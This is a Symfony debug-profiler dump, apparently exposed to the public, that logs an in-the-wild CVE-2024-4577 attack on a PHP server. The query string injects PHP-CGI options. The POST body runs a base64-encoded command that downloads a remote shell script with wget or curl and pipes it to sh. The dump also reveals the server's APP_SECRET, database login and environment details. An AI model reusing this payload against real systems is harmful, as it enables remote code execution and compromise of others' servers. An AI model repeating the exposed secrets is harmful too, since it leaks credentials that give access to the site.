POST http://51.83.73.80/hello.world?%ADd%20allow_url_include%3D1%20%ADd%20auto_prepend_file%3Dphp%3A%2F%2Finput=

Request / Response

Request

GET Parameters

Key Value
�d_allow_url_include=1_�d_auto_prepend_file=php://input
""

POST Parameters

Key Value
<?php_shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMTQuNDYuMTM2Ljc3L3NoIHx8IGN1cmwgLXNrIGh0dHBzOi8vMTQuNDYuMTM2Ljc3L3NoKSB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA
"=")); echo(md5("Hello CVE-2024-4577")); ?>"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_stopwatch_token
"909461"

Request Headers

Header Value
accept
"*/*"
connection
"keep-alive"
content-length
"241"
content-type
"application/x-www-form-urlencoded"
host
"51.83.73.80:80"
upgrade-insecure-requests
"1"
user-agent
"libredtail-http"
x-php-ob-level
"1"

Request Content

Raw

<?php shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMTQuNDYuMTM2Ljc3L3NoIHx8IGN1cmwgLXNrIGh0dHBzOi8vMTQuNDYuMTM2Ljc3L3NoKSB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA==")); echo(md5("Hello CVE-2024-4577")); ?>

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=utf-8"
date
"Tue, 09 Jun 2026 14:58:34 GMT"
location
"/dashboard"
x-debug-token
"28b5fb"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV
"dev"
APP_SECRET
"4a960169755314cd33adcf9d59055262"
DATABASE_URL
"mysql://admin:admin@127.0.0.1:3306/decol_hq6_v1_db?server_version=8.0.32&charset=utf8mb4"
DEFAULT_URI
"http://localhost"
MAILER_DSN
"null://null"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
CONTENT_LENGTH
"241"
CONTENT_TYPE
"application/x-www-form-urlencoded"
CONTEXT_DOCUMENT_ROOT
"/var/www/decol_hq6_v1/public/"
CONTEXT_PREFIX
""
DOCUMENT_ROOT
"/var/www/decol_hq6_v1/public/"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
HOME
"/var/www"
HTTP_ACCEPT
"*/*"
HTTP_CONNECTION
"keep-alive"
HTTP_HOST
"51.83.73.80:80"
HTTP_UPGRADE_INSECURE_REQUESTS
"1"
HTTP_USER_AGENT
"libredtail-http"
PATH
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/snap/bin"
PHP_SELF
"/index.php"
QUERY_STRING
"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_QUERY_STRING
"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_STATUS
"200"
REDIRECT_URL
"/hello.world"
REMOTE_ADDR
"45.138.73.54"
REMOTE_PORT
"39516"
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"http"
REQUEST_TIME
1781017114
REQUEST_TIME_FLOAT
1781017114.9001
REQUEST_URI
"/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
SCRIPT_FILENAME
"/var/www/decol_hq6_v1/public/index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"51.83.73.80"
SERVER_ADMIN
"[no address given]"
SERVER_NAME
"51.83.73.80"
SERVER_PORT
"80"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SIGNATURE
"<address>Apache/2.4.62 (Ubuntu) Server at 51.83.73.80 Port 80</address>\n"
SERVER_SOFTWARE
"Apache/2.4.62 (Ubuntu)"
SYMFONY_DOTENV_PATH
"/var/www/decol_hq6_v1/.env"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,DATABASE_URL,DEFAULT_URI,MAILER_DSN"
USER
"www-data"
proxy-nokeepalive
"1"